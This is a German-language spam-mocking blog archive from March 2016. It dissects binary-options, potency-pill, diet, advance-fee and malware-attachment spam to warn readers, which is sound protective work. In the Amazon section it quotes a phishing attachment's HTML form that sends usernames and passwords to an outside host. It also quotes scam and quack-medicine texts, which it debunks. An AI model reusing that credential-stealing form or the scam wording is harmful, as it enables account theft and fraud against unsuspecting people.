Monatsarchiv für März 2016

The Freedom of Living

Donnerstag, 31. März 2016

Entdecken Sie die wunderbare FREIHEIT vom Binäroptionenhandel [sic!]

View It Online

Registrieren Sie ein kostenloses Konto mit dem Link unterhalb und bekommen 3 risikofreie Handel. Wenn Ihre Handel im Geld sind [sic!], ernten Sie den Gewinn. Wenn Ihre Handel aus dem Geld sind [sic!], verlieren Sie keinen Cent.

REGULIERUNG: Banc De Binary ist ein Finanzdienstleister, der von der Cyprus Securities Exchange Commission (CySEC) unter der Lizenznummer 188/13 autorisiert und reguliert wurde und bei globalen Regierungsbehörden, wie der FSA, FSB und anderen finanziellen Lizenzierungsbehörden des EWR registriert ist.

Unsubscribe me from this list

Ich mag es ja, dass die Sprache der Spams für irgendwelche an der Börse gehandelten, hochspekulativen Wettzettel inzwischen genau so klingt wie die Spam für irgendwelche windigen Abzockcasinos im Internet. Da ist zusammengewachsen, was schon lange zueinander strebte – und das nicht nur in der Spam, sondern auch im wirklichen Leben. Für die widerlichen Spammer ist es übrigens das gleiche Geschäft, denn sie werden weder im Casino noch an der Börse reich, sondern leben von den Affiliate-Geldern, die sie dafür bekommen, dass sie windigen Casinos und fragwürdigen Internetbrokern neue Kunden zuschieben. Sonst würden sie ja nicht spammen…

Der wichtigste Unterschied zwischen Spielcasino und Börse liegt übrigens immer noch darin, dass es nicht jeden verdammten Abend kurz vor der 20:00-Uhr-Tagesschau in der ARD eine Liveübertragung aus der Spielbank Baden-Baden mit dem Titel „Casino vor acht“ gibt, in welcher ein Spezialexperte die Permanenzen wortreich und in ernstester Geste ausdeutet.

Re:

Mittwoch, 30. März 2016

Tja, mit den Worten hat es dieser Spammer nicht so, stattdessen „erfreut“ er seine Empfänger mit einem 55,3 KiB schweren Bildchen, das deutlich weniger als tausend Worte sagt:

Abbildung einer Medikamentenflasche mit Etikett 'VigRX for Men, oral', an der Medikamentenflasche ein 'Product Security Seal', dass dazu auffordert, auf einer Website sechzehn Neunen einzugeben, um die Echtheit des Produktes zu prüfen, dazu der Text 'Natürlich und effektiv. Die erste Wahl seit 2001. Offizielle Website von VigRX.

Ich mag ja das Spamsiegel mit den vielen Neunen, das mir ermöglicht, die Echtheit zu überprüfen – hier noch einmal etwas vergrößert und dadurch leider verwaschen, aber in seiner Peinlichkeit viel deutlicher:

Detail aus der Spam. Das Siegel. 'Visit VigRX.com & input code -- Check Authenticity -- 9999 9999 9999 9999 -- LeadingEdge Health -- Product security seal

Ob die so angepriesene Pimmelpille wirklich etwas für den Pimmel tut, kann ich natürlich nicht sagen, aber zur Förderung zur Selbstmassage des Zwerchfells ist sie nicht schlecht.

Nach diesem Einblick in die von sechzehn Neunen besiegelte Echtheit des Produktes noch ein weiterer Blick in seine Präsentation im Web – natürlich nehme ich aus naheliegenden Gründen keinen „richtigen“ Browser dafür, sondern schaue mir auf der Kommandozeile an, was einem Besucher unbemerkt alles zugemutet wird. In den folgenden Zeilen habe ich stark gekürzt, um die endlosen Javascript-, Tracker- und Zählerwüsten zu ersparen¹:

$ lynx -mime_header http://www.exelorio.biz.ua/exelorio/index.html
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 30 Mar 2016 06:41:46 GMT
Content-Type: text/html
Content-Length: 1496
Connection: close
Last-Modified: Tue, 29 Mar 2016 14:59:18 GMT
ETag: "37c0390-5d8-52f314605d690"
Accept-Ranges: bytes
Vary: Accept-Encoding

<!-- Rd. dreißig Zeilen Javascript entfernt -->
<META HTTP-EQUIV="REFRESH" CONTENT="1; URL=
http://www.exelorio.biz.ua/medipreise/index.html">
$ _

Tja, so ist das eben, wenn man eine „offizielle Website“ aus der Spam besucht – das ist niemals ein direkter Link, sondern immer eine alles verschleiernde Weiterleitungswüste. Und nein, mit einer Weiterleitung ist es nicht genug. Auch hier habe ich wieder stark gekürzt:

$ lynx -mime_header http://www.exelorio.biz.ua/medipreise/index.html
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 30 Mar 2016 06:49:02 GMT
Content-Type: text/html
Content-Length: 1488
Connection: close
Last-Modified: Tue, 29 Mar 2016 14:58:52 GMT
ETag: "37c038e-5d0-52f31448237bd"
Accept-Ranges: bytes
Vary: Accept-Encoding

<!-- Rd. dreißig Zeilen Javascript entfernt -->
<META HTTP-EQUIV="REFRESH" CONTENT="1; URL=
http://www.medipreise.info/#!vigrx/q5zpo">

$ _

Ob es wohl gleich noch eine Weiterleitung gibt?

$ lynx -mime_header 'http://www.medipreise.info/#!vigrx/q5zpo' | sed '/^\s*$/q'
HTTP/1.1 200 OK
Cache-Control: max-age=0, must-revalidate
Content-Language: en
Content-Type: text/html;charset=UTF-8
Date: Wed, 30 Mar 2016 07:01:18 GMT
ETag: ffca9f612019e88c0c0b71d1b0c10a32
Expires: -1
Pragma: no-cache
Server: Pepyaka/1.9.9
Vary: User-Agent,Accept-Encoding
Via: 1.0 username.wix.com
X-Seen-By: /0b3tu7BwMUubvM+8DFnyIZhbXxmdS0SoYtN65Ns3dwVg8yBNrCddpK11/FwIFN7,LwsIp90Tma5sliyMxJYVEimxe5u57vJkW8Ut+ygV+W3naXGSE7xQP0F5eUkr7UI2,Tw2AanFDQ+Wwo8Xxk6ZL7rHKeAJXtkPxqn+uc4aMlOC9TZSDiwEgQLyYAOfMlNNfnUoPRWylvzmW1WtoYIgS/A==,9/zAiwmuIQ5G9xgIqi9IpfKjiM3HhjsT5sK9PwlANII=
X-Wix-Renderer-Server: app205.vae.aws
X-Wix-Request-Id: 1459321278.2271453355868244144
Content-Length: 16073
Connection: Close

$ _

Aber nein. Damit sind wir endlich am „Ziel“ angekommen – auf einer tollen Seite mit dem tollen Titel „Preisvergleich in Apotheken“, die so stark auf Javascript setzt, dass sie ohne Javascript fast nichts mehr anzeigt. Weil der Spammer es nicht so mit Technik hat und das Internet eigentlich nur zum Spammen verwenden möchte, wurde diese Seite schnell mit dem kostenlos nutzbaren „Website Builder“ unter wix (punkt) com zusammengeklickt², dessen Website einem eventuellen Besucher ohne Javascript übrigens auch gar nichts zu sagen hat, nicht einmal ein Impressum ist verfügbar. Dafür gibts wenigstens ein Video. Hier bekommt die „Generation Jamba“ die Gelegenheit geboten, sich ins Web zu entfalten… ach! 🙁

So, jetzt aber zum gülden gleißenden Glanzstück der flüchtigen Recherche. Hier ist der Inhalt der Website der Spamkünstler, zusammengesetzt aus etlichen Quellen, technisch realisiert mit wix (punkt) com, inhaltlich hochreiner Bullshit, dargestellt in einem Firefox mit abgeschaltetem Javascript:

VigRX

VigRX™ ist ein ganzheitliches [Bingo!] und natürliches [Bingo!] Nahrungsergänzungsmittel zur Stärkung der männlichen Potenz und zur Steigerung der Penisgröße [Bingo!]. Es liefert wichtige Vitamine [Bingo!] und Nährstoffe [Bingo!] und optimiert [Bingo!] hierdurch die Durchblutung im Genitalbereich, was zu härteren und länger anhaltenden Erektionen führt. Die Wirkung fördert [Bingo!] zudem das körpereigene Zellwachstum [Bingo!] im Penis und setzt somit ein natürliches Peniswachstum [Bingo!] in Gang.

Willkommen auf der offiziellen Webseite von VigRX™. | 5% OFF Code: XXQRT8

© 2016 Die günstigsten preise [sic!]

Nun, ich wünsche guten Appetit mit dem ganzheitlichen und natürlichen Nahrungsergänzungsmittel, das den Pimmel länger macht. Der Link auf die „offizielle Website“ ist über Googles URL-Kürzungsdienst maskiert, weil Spammer nun einmal keine direkten Links mögen und weil so…

$ lynx -mime_header http://goo.gl/nvzC2D | sed '/^\s*$/q'
HTTP/1.0 301 Moved Permanently
Strict-Transport-Security: max-age=10886400;
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Wed, 30 Mar 2016 09:32:38 GMT
Location: http://track.healthtrader.com/track.php?c=cmlkPTEwMDU5MyZhaWQ9NTAwMTAxNjI
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Accept-Ranges: none
Vary: Accept-Encoding

$ _

…die angehängte Affiliate-ID weniger auffällt. Auf der Zielseite gibt es übrigens keinerlei Inhalte, die man ohne Flash und Javascript betrachten könnte – und ein in einem sicher konfigurierten Browser sichtbares Impressum gibt es auch nicht. Aber wozu denn auch, es geht ja nur um die Gesundheit. 😈

¹Die gelegentlich sichtbare Pipe auf sed ist dafür da, die Ausgabe nach den HTTP-Headerzeilen (also nach der ersten Leerzeile) abzubrechen. Für die Syntax von sed kann ich nichts, außer vielleicht sagen, dass es nicht halb so schlimm ist, wie es aussieht – aber oft sehr nützlich. Der eingefügte Kommentar mit dem Hinweis auf eine Löschung ist natürlich von mir.

²Natürlich kann der mir unbekannte Betreiber von wix (punkt) com nichts dafür, dass ein derartiges Angebot auch von Vollidioten wie diesem Spammer genutzt wird. Eine auch in einem sicher konfigurierten Browser sichtbare Kontaktadresse für die Meldung eines Missbrauches hätte ich gut gefunden, das Fehlen einer solchen Kontaktadresse halte ich für ein Zeichen, dass man von diesem Dienst unbedingt die Finger lassen sollte. Außer natürlich, man ist Spammer und möchte mit seinen grenzkriminellen oder offen kriminellen Webauftritten nicht vorzeitig aus dem Web entfernt werden… dafür bietet wix (punkt) com in der momentanen Form ein ideales Biotop.

Wer so einen Namen hat…

Dienstag, 29. März 2016

Wer so einen „Namen“ wie dieser Kommentarspammer mit seiner dynamischen IP-Adresse aus Ägypten hat, der sich eben gerade hier auf Unser täglich Spam mit einem „Kommentar“ zu einem etwas älteren Text verewigen wollte, kann ja nur noch Spammer werden:

Name: best forex signal provider best forex signals forex signal provider best forex signal provider in the world forex signals providers best forex signals provider forex signal providers forex signals forex signals provider best forex signals in the world bes

Valuable information. Fortunate me I discoveed your web site
accidentally, and I‘m surprised why this accident did not came about earlier!
I bookmarked it.

Aber dafür, dass der „Name“ länger ist als der „Kommentar“, hat dann auch der Link nicht richtig funktioniert – er sollte eigentlich auf einen QR-Code gehen (für Idioten, die bei einer unverständlichen Spam dann auch noch das Handy an den Monitor halten, weil sie vor lauter Neugier im Hirne schon zu brennen begonnen haben, und die mit dieser dummen Geste gleich zwei Geräte auf einmal den möglichen Angriffen eines Kriminellen aussetzen). Nun, mit der intellektuellen Anforderung, das Bild zu speichern und bei einem Imagehoster hochzuladen, war der Vollidiot von Spammer überfordert, und stattdessen nahm er die URI aus der Adresszeile des Browsers als Link. In der Folge führt der Link nicht zu den großartigsten Forex-Hellsehern¹ der Welt, sondern auf die Website eines russischsprachigen QR-Code-Generators. Für die zwanzig bis fünfzig Leute auf der Welt, die auf die mutmaßlich vielen Millionen im Web verteilten Kommentarspams reingefallen sind, weil sie allen Ernstes glauben, dass Börsenspezialisten Kommentarspams schreiben, statt selbst reich zu werden, ist das auch besser so…

Klar, diesen Fehler hätte der Vollidiot von Spammer mit dem einfachsten denkbaren Test vorm Absetzen von Millionen Kommentarspams durch ein Botnetz vermeiden können: Einfach einmal die URI, die man als Link verwendet, in die Adresszeile des Brausers eingeben. Aber so viel Mühe sind diesem Vollidioten von Spammer seine Opfer einfach nicht wert.

Forex: Devisenmarkt. (Englisches Aküwort für Foreign Exchange Market.)

Your Urine Color Linked To Weight Gain

Sonntag, 27. März 2016

Ja, das war wirklich der Betreff.

Von: Weight Gain Symptom <WeightGainSymptom@diet.com>

Wenn ich mir einen Namen für den Absender einer E-Mail ausdenken sollte, die der Empfänger dann auch lesen soll, wäre „Symptom der Gewichtszunahme“ so ziemlich die letzte Idee, die mir in die cerebralen Ödnisse schösse.

Dear

Oh, Dear Lord Almighty, keep me away from that pile of bullshit!

Even scientists were alarmed when they
saw this…

Aha, ich verstehe: Bei der Zielgruppe dieses Spammers handelt es sich um Leute, die ihre Wissenschaftsmeldungen immer aus E-Mails von irgendwelchen Unbekannten beziehen.

They couldn’t believe people with weight
issues all have this one thing in common.

The color of their urine.

Kannst du, werter Spammer, mir bitte mal das Paper nennen, in dem diese Erkenntnis (und die Methodik, mit der man sie gewann) veröffentlicht wurde? Ach Quatsch, das mit der Zielgruppe hast du ja schon weiter oben klar gemacht.

And somehow, your pee’s color determines
how easily you gain weight.

Da ist es auch kein Wunder, dass du einfach nochmal schreibst, was du schon geschrieben hast – und dabei gleich an deine Zielgruppe denkst: Denn wer so ein Fremdwort wie „Urin“ nicht versteht, weiß bestimmt trotzdem noch, was „Pipi“ ist, wo der rauskommt und dass er eine Farbe hat.

Ja, kann schon sein, dass der dir dann auch glaubt, dass es einen Zusammenhang zwischen der Farbe seines Pipis und seiner Wampe gäbe. Aber etliche von denen hätten dir auch geglaubt, dass es einen Zusammenhang zwischen der Farbabsorption im von ihnen produzierten und emittierten uninalen Stoffgemisch in wässriger Lösung und den demnächst gezogenen Lottozahlen gibt.

Why?

It all has to do with the amount of water
you drink…

Und warum das alles: Weil die Farbe des abgelassenen Wassers von der Menge des aufgenommenen Wassers abhängt. Für einen Medizinnobelpreis, werter Spammer, wirds leider mal wieder nicht reichen, aber es klingt plaubsibel. Und jetzt bitte der Zusammenhang zum Körpergewicht:

And why if you exceed this
amount of water intake a day, you could
have a wrecked metabolism.

Ähmm… also…. wenn man eine vom Spammer nicht näher benannte Wasseraufnahme pro Tag überschreitet, könnte man einen schrottigen Stoffwechsel haben.

Hmm!

Also ich finde das als Erklärung des Zusammenhanges jetzt ein bisschen dürftig. 😉

Find out more here:

Aber du bist ja nett, werter Spammer, und gibst mir noch einen Hinweis auf weiterführende Informationen, die genau so glaubwürdig wie die „Informationen“ eines Spammers sind, doch leider hast du es vergessen…

Urine Color Linked To Weight Gain?

…darauf auch einen Link zu setzen. Dieser technische Frickelkram auch immer! Na ja, hauptsache, du kennst dich mit der Farbe deines Urins aus.

Vielleicht klappt es mit deiner wirksamen Spam, die neue Opfer zu irgendwelchen Websites mit obskuren Schlankheitspillen treibt, ja besser beim nächsten Mal. 😀

Thanks

Nichts zu danken, ich habe sehr gelacht.

Spam-Splitter

Samstag, 26. März 2016

Oh, so viele… 😯

Von: Spens <imkuqkn (at) giopik (punkt) co (punkt) ua>

Nein, das heißt „Spams“.

Betreff: From Miss.Rose Richard, Abidjan,Ivory Coast, In confidence, I have to introduce myself to you. I am Miss. Rose Richard, 21 years old, I am the only daughter of late Mr & Mrs. Yves Richard. I prayed before contacting you, please for God sake do not see my mail as an embarrassment as we do not know each other before. I wish to request for your assistance in my efforts to receive the transfer of my inherited money for investment ventures under your care and directive, while i will continue my education there in your country. I inherited Six Million Four Hundred Thousand Dollars ($6,400,000.00) here in my name with one of the prime bank in my country here and i will require your assistance in receiving the transfer of my inherited money in your local account for an investment purposes, as it is my wish to come over to your country to further my education while you take care of the investment of the money. Please i am an orphan and i need your assistance to transfer my inherited money to your country and also your assistance to secure a nice school for me in your country where i will continue my education. Thanks so much. I am waiting to hear from you. Yours sincerely. Rose Richard

So so, du willst also deine Ausbildung voranbringen. Lern du doch erstmal, was der Unterschied zwischen dem Betreff und dem Text der Mail ist. Ist auch nicht so schwierig.

Betreff: Ich fi**e dich 48 Stunden: 20% Rabatt bei Erekitons-Pillen

Was, du filmst mich 48 Stunden? Das müssen aber öde Dreharbeiten sein. Na ja, du drehst ja sogar Buchtsaben.

Wenn Sie Probleme beim Lesen dieser E-Mail haben, klicken Sie hier für eine Web-basierte Version

Wenn unsere HTML-formatierte Spam nicht lesbar ist, schauen sie sich erstmal das HTML auf unserer Website an! Das ist bestimmt besser!

Good day.

Vielen Dank für deine freundlichen Wünsche, Spammer!

Sehr geehrte Frau Kohlmann, […]

Fast richtig. Ich habe schließlich auch einen Nachnamen.

[Die von den Spammern verwendeten Daten stammen aus einem Forenhack.]

Zum 1.4. wird, so wie derzeit die Aktenlage ist, Ihr Krankenkassen-Tarif einer der teuersten sein den es gibt.

Klar, aber nur nach euren „Akten“. Die nennt der Rest der Welt übrigens Tarot.

We offer secured and unsecured loans to interested individuals and businesses rate. Perhaps low interest loans for debt consolidation, Home improvements, buy a new or used car, a new home, investment / business expansion purposes, or even a vacation required.

Ob man Mensch oder Unternehmen ist; ob man seine Darlehen mit anderen Darlehen bezahlt oder einfach nur einen Verbrauchtwagen kaufen will, bei euch spielt es keine Rolle. Jeder darf euch, die ihr gern das Geld verleiht, ein paar Euro Vorleistung über Western Union zustecken, weil ihr leider gar kein Konto verwenden wollt. Ihr habt nämlich einen riesen Geldspeicher, in dem ihr euer ganzes Geld aufbewahrt, um es verleihen zu können.

Unser Mitglieder [sic!] hinterlässt Dir folgende Nachricht:
„Tschauiii!! Ich haben [sic!] Dein Profil entdeckt und denk mir so dass Du ganz süß bist. Wir wohnen auch voll nahe zusammen. Wollen wir mal hei…“

Nein, ich will dich nicht heiraten.

Im Anhang erhalten Sie Ihre Rechnung

Oh, das ist ja nett. Ein Word-Dokument. Und so ein umfangreiches Dokument:

$ file rechn_49914-auftrgb | sed 's/, /\n/g'
rechn_49914-auftrgb: Composite Document File V2 Document
Little Endian
Os: Windows
Version 6.1
Code page: 1251
Title:  
Template: Normal.dot
Revision Number: 7
Name of Creating Application: Microsoft Office Word
Total Editing Time: 03:00
Create Time/Date: Tue Mar 22 23:40:00 2016
Last Saved Time/Date: Tue Mar 22 23:47:00 2016
Number of Pages: 1
Number of Words: 1
Number of Characters: 11
Security: 0

Genau ein Wort aus elf Buchstaben steht drin. Das nenne ich eine kurzgefasste Rechnung. Und mit so schöner, wenn auch nicht mehr ganz aktueller Schadsoftware als Makro. Aber ihr habt den kriminellen Versuch ja auch schon vor drei Tagen zusammengeklebt. Erstaunlich, dass nach drei Tagen immer noch die Hälfte der Antivirus-Schlangenöle an der Erkennung scheitert.

Das muss schon bitter sein, wenn man sich auf diesen „Schutz“ verlässt. Wer unabgesprochene Mailanhänge aufmacht und damit irgendwelchen Gestalten die Möglichkeit gibt, Code auf seinem Rechner auszuführen, spielt russisches Roulette mit seinem Computer. Am besten immer unbesehen löschen.

Your order details are attached.

Und es gibt im Moment so unfassbar viel Schadsoftware.

Die Entwicklung des Bitcoin-Kurses in den letzten Monaten (momentaner Wert eines BTC sind rd. 375 Euro) zeigt, dass die in Bitcoin bezahlten Erpressungstrojaner wohl erschreckend erfolgreich sind – und dass viele Menschen damit überfordert sind, eine angemessene Backup-Strategie zu entwickeln.

Deshalb macht man niemals unabgesprochene Mailanhänge auf.

Thank you for your order. Your Invoice – F-045313 – is attached.

As agreed this invoice will NOT be sent via post.

Wenn ihr es nicht schafft, mir eine Rechnung zuzustellen, ist das euer Problem, nicht meines. Ein ZIP-Archiv mit einem kryptisch formulierten Javascript-Programm für den Windows Scripting Host… so etwas führt nur aus, wer sich bei der Verteilung der Intelligenz nicht vorgedrängelt hat.

We want to tell you about this billon-views video about how to find a girl online.

Was, eine Milliarde Leute gucken sich euren Müll an, und ihr habt es immer noch nötig, anderen Menschen das Postfach vollzumachen.

Sie können sich auf Pillen aus einer offiziellen Apotheke freuen, die sie REZEPTFREI zu einem sehr guten Preis mit unschlagbarem Support erhalten.

Genau, die „offizielle Apotheke“, die verschreibungspflichtige Arzneien rezeptfrei abgibt. Und billig. Wohl dem, der Glück hat und einfach nur nichts geliefert bekommt – denn so überlebt man wenigstens.

This gentlemen claimed to be your representative, and this power of attorney stated that you are dead […]

Was? Ich bin tot? Von wo aus schreibe ich wohl dieses Posting…

We use Linkedin to flood our business with leads […]

Nein, ihr benutzt ein Botnetz, um anderer Menschen Postfächer mit Scheiße zu fluten.

Mira möchte sich mit Dir treffen und hat Dir eine Nachricht geschrieben.

Dass diese ganzen Frauen mir auch nie einfach eine direkte Mail schreiben, wenn sie doch schon die Adresse haben…

God will bless you for saving my life and future.

Du kannst ja so froh darüber sein, dass Gott auf Heuchelei nicht mehr wie früher mit einem zünftigen Feuerregen reagiert. Ich finde es allerdings manchmal ein bisschen schade. 😈

Sweet kiss )

Ich glaube, so etwas ähnliches hat Judas Iskariot bei seinem Bussi auch gesagt.

Diese E-Mail wurde gesendet an gammelfleisch (at) tamagothi (punkt) de, unter Beachtung der gesetzlichen Rechte in Bezug auf E-Mail-Marketing-und Datenschutzgesetze in Europa.Wenn man bedenkt, dass diese E-Mail Ihnen Fehlerhaft gesendet wurde, so informieren Sie uns bitte so bald wie möglich. Um Ihre E-Mail aus der Mailingliste zu entfernen, klicken Sie hier.

Diese Spam ist eine Spam.

Impressum des eMail-Versenders (nicht des Anbieters dieser Inhalte!): odzlofki Limited, 69 Lower Hampton Street, B28 7EW Birmingham, United Kingdom

Oh, was für eine glaubhafte Firmierung!

Unsubscribe me from this list

Du mich auch.

Entf!

Reply

Freitag, 25. März 2016

Die E-Mail wurde von einer IP-Adresse versandt, die dem Hotel des internationalen Flughafens von Yuschno-Sachalinsk zugeteilt wurde. Mit an Sicherheit grenzender Wahrscheinlichkeit handelt es sich um einen dort genutzten Rechner, der von Kriminellen mit Schadsoftware übernommen und zum Bot gemacht wurde. Diese E-Mail hat niemals einen Rechner in Ghana gesehen.

Von: Mr. Kwame <kwameakaba (at) ecobank (punkt) com>
Antwort an: kwame (punkt) akaba50 (at) yahoo (punkt) com (punkt) ph

Die Absenderadresse ist gefälscht.

Please do not be surprise receiving this mail, I am MR KWAME AKABA a banker with ECOBANK OF GHANA.

Sei nicht überrascht, dass du eine Spam bekommst. Ich habe mir für mich einen Namen ausgedacht, und einen Beruf, der zwar widerlich und unanständig ist, aber immer noch erträglicher als Spammer. Irgendwelche Formalien wie eine persönliche Ansprache meiner Empfänger gibt es von mir nicht, aber das hat wirklich nichts damit zu tun, dass ich gar nicht weiß, wer du bist, denn…

I have a proposal to discuss with you about a bonded account that have to do with your family name.

…der „Geschäftsvorschlag“, den ich dir unterbreiten möchte, hat schließlich etwas mit deinem Namen zu tun.

Please get back to me if you are interested to know.

Wenn du noch mehr lustige Lügen hören willst, antworte mir einfach. Deinen Namen wirst du da ja drunterschreiben, so dass ich mit meiner Bande den Rest der Nummer bei dir durchziehen kann und dich dabei sogar richtig ansprechen kann. Dann hörst du eine lustige Lügengeschichte von hier herumliegenden Millionen, und dann legst du eine Vorleistung nach der anderen, und zwar immer schön über Western Union und MoneyGram, denn ich bin Banker und benutze deshalb keine Bankkonten und kann auch keinen Scheck einreichen.

Regards,
Kwame Akaba

Mit Gruß von deinem Vorschussbetrugsspammer.

Reinigung des Korpers von Toxinen

Donnerstag, 24. März 2016

Aber ich habe den Becher Quecksilber doch gar nicht ausgetrunken… 😀

Der anonym bleibende Verfasser dieser Spam zur Vermarktung von Quacksalber-Produkten zieht es vor, in seiner Spam nichts in Worten mitzuteilen, sondern stattdessen ein JPEG-Bild mit den dummen und irreführenden Behauptungen zu verwenden. Der schwarze Balken und der ätzrote überlagerte Text sind von mir, zum Vergrößern auf Originalgröße einfach auf das kleine Bild klicken:

Von mir zu diesem gefährlichen Bullshit nur eine kleine Anmerkung. Menschen bekommen ihre schwabbelige Wampe mit Fettvorräten nicht davon, dass sie mit ungenannten Giftstoffen vergiftet sind, die mit medizinisch unbekannten Methoden „ausgespült“ werden müssen, sondern schlicht davon, dass sie mehr Energie in Form von Nahrung in sich reinstecken, als sie durch ihre Stoffwechselvorgänge verbrauchen. Wer mir das nicht glaubt und es nach jahrelanger Verdummung durch Frauenzeitschriften, Bullshit-Journalismus und Esoterik-Marktschreier nicht spontan selbst einsieht, kann gern mal einen richtigen Arzt danach fragen. Der richtige Arzt wird dann sicherlich auch noch darauf hinweisen, dass es im Körper keine „Schlacken“ und auch nichts vergleichbares gibt, denn ein Körper ist kein Hochofen.

Die Form, in der – wohlgemerkt: von Versendern illegaler und asozialer Spam, die genau wissen, dass sich ihr Produkt nur mit illegaler und asozialer Spam und falschen Behauptungen an den Käufer bringen lässt – hier Frauen, die unter einem gestörten Selbstbild leiden und deshalb dringend therapiebedürftig sind, ein (im besten Fall wirkungsloses, vielleicht sogar gefährliches) Quacksalber-Produkt nebst quasi-magischer paramedizinischer Erklärung als „Lösung“ angedreht werden soll, widert mich an. Spammer, du bist ein Arschloch! Geh bitte ganz schnell sterben! 👿

Oh, unter dem Bild, mit dem die Nennung des Namens „Detox Pro“ vermieden werden sollte, steht ja noch etwas Text:

Wenn Sie nicht mehr erhalten möchten E-Mail-Newsletter und spezielle Preise auf die waren geben Sie Ihre E-Mail auf den Link

Das passt, sowohl von seiner Intelligenzleistung her als auch vom Maß der „Wertschätzung“ des Empfängers.

Ihr Amazon-Konto wurde ausgesetzt

Mittwoch, 23. März 2016

Und ich habe doch gar keines… 😉

Von: amazon (punkt) powering (at) msg (punkt) afterbuy (punkt) de
An: gammelfleisch (at) tamagothi (punkt) de

Diese Spam geht an alle möglichen aus dem Internet eingesammelten Adressen, und der Spammer fälscht zwar den Absender, ist aber zu doof dazu, es so zu machen, dass der Absender auch wirklich nach Amazon aussieht. Aber zum Ausgleich…

Hallo von Amazon-Sicherheit,

…sieht die Anrede auch nicht ganz so überzeugend aus. 😀

Hier ist eine wichtige Nachricht von Amazon.de. Bitte lesen Sie diese Nachricht sorgfaeltig durch, da sie Ihr Kundenkonto bei Amazon.de betrifft.

Wir ueberpruefen routinemaessig Kundenkonten. Bei der Pruefung Ihres Kundenkontos erhaertete sich leider unser Verdacht, dass ein Unberechtigter Zugriff auf dieses hatte.

Aus diesem Grund haben wir Ihr Kundenkonto voruebergehend gesperrt. Niemand kann derzeit auf Ihr Kundenkonto zugreifen, Sie eingeschlossen.

Oh, wie bitter! Amazon nimmt jetzt wohl auf seiner Website über eine noch völlig unbekannte Schnittstelle den Besuchern Fingerabdrücke ab, und wenn jemand das richtige Passwort eingibt, aber den falschen Fingerabdruck hat, dann wird einfach der Account gesperrt. Und es gibt nur eine einzige Möglichkeit, was man dagegen tun kann:

Um Ihr Kundenkonto zu entsperren, befestigt auf diesem E-Mail [sic!] sie haben das Formular.

Bitte laden Sie das Formular und geben Sie Ihre Daten.

Man muss den Anhang einer E-Mail öffnen, die von Unbekannten mit gefälschtem Absender und voller falscher Behauptungen in recht fragwürdigem Deutsch versendet wurde. Auch, wenn da diesmal keine Schadsoftware dranhängt¹, sondern nur ein krimineller Versuch, an die Passwörter anderer Leute zu kommen, ist das Öffnen von unverabredeten Anhängen in E-Mails immer eine ganz schlechte Idee.

Übrigens sieht das Formular im angehängten HTML-Dokument – was nach der stümperhaft formulierten Phishing-Spam gar nicht zu erwarten war – recht gut aus:

Das gesamte Design besteht nicht etwa aus Texten, sondern ist ein großes Bild, das bei einem anonym nutzbaren, kostenlosen Bildupload-Dienst hinterlegt wurde. Natürlich habe ich directupload (punkt) net schon mit einer Mail darauf hingewiesen, dass der Dienst von Spammern missbraucht wird und erwarte deshalb eine baldige Löschung dieses Blendwerkes. Leider ist das nur ein Tropfen auf dem heißen Stein; ein neues Bild ist schnell hochgeladen und ein paar Millionen Spams sind schnell versendet, der Schaden wird schnell seine naiven Opfer auf anderem Wege finden. 🙁

Was auch immer man in diesem angehängten HTML-Dokument eingibt, geht nicht etwa zu Amazon, sondern…

<form method="post"
action="http://www.desentupidoraapolinario.com.br/zmd/404.php">
<input
style="top: -83px; height: 17px; left: -949px; width: 223px;"
id="user" name="user" value="" type="text" required/>
<input style="top: -99px; height: 17px; left: -949px; width: 223px;"
id="pass" name="pass" value="" type="password" required/><input
style="top: -123px; height: 20px; left: -890px; width: 165px;"
id="submit" name="submit" value="" type="submit">
</form>

…wird an eine deutlich weniger Vertrauen erweckende Domain gesendet. Aber das ist ja auch gar keine Überraschung, denn es handelt sich um eine Spam.

Und nein: Es kann nicht dazu kommen, dass eine ähnliche Mail einmal „echt“ ist. Solche E-Mails sind immer Phishing-Versuche. Amazon versendet keine E-Mail mit Anhängen, in denen Formulare liegen, in denen der Empfänger sein Passwort eingeben soll, und übrigens auch keine mit Links auf derartige Formulare. Und genau das Gleiche gilt für jeden anderen Anbieter von Webdiensten. Und natürlich auch für jede Bank. Und einfach nur generell. Die einzigen Menschen, die so etwas machen, sind Kriminelle.

Es ist also gar nicht so schwierig, nicht darauf hereinzufallen.

Selbst, wenn man sich einmal unsicher ist, sollte eine E-Mail niemals ein Grund zu panischem Geklicke werden, denn Kriminelle verstehen sich darauf, Menschen zu überrumpeln. Sie leben schließlich davon, dass ihre fiesen Tricks zumindest manchmal funktionieren. Immer vor dem Klick nachdenken. Und im Zweifelsfall einfach rückfragen.

Sobald Sie dies tun, werden Sie Ihr Konto wieder verwenden, um Produkte auf Amazon Europa zu verkaufen!

Freundliche Muller,
Das Amazon Services Team

Freundliche was?

Wenn Sie solche E-Mails nicht mehr erhalten mцchten, kцnnen Sie sich hier abmelden.

Ist ja schon ein bisschen peinlich, wenn man dabei den Link vergisst, nicht?

Aber der Kriminelle hat seine eigentliche „Botschaft“ ja rübergebracht, und jetzt ist er mit seinen Gedanken schon wieder bei den Nutten, so dass die Sorgfalt für eher formale, unwichtige Dinge eben nachlässt. Wenn man darauf achtet, kann man derartige Fehler in sehr vielen Spams sehen. Wenn sich der Spammer Mühe geben wollte, könnte er ja gleich arbeiten gehen.

© 2016 Amazon.com Inc. oder Tochtergesellschaften. Alle Rechte vorbehalten. Amazon Services Europe S.а r.l. 5 Rue Plaetis L-2338 Luxembourg, Handelsregisternummer Luxemburg: B-93815, Gesellschaftskapital 37.500 EUR, Gewerbelizenznummer: 100416, USt.-Identifikationsnummer Luxemburg: LU 19647148.

Nein, diese Spam wurde von einer dynamischen IP-Adresse eines Kunden bei einem Telekommunikationsanbieter aus Arizona, USA versendet; mit an Sicherheit grenzender Wahrscheinlichkeit handelt es sich um einen mit Schadsoftware feindselig übernommenen Rechner, der Teil eines Botnetzes ist. Diese Spam hat niemals einen Server von Amazon gesehen.

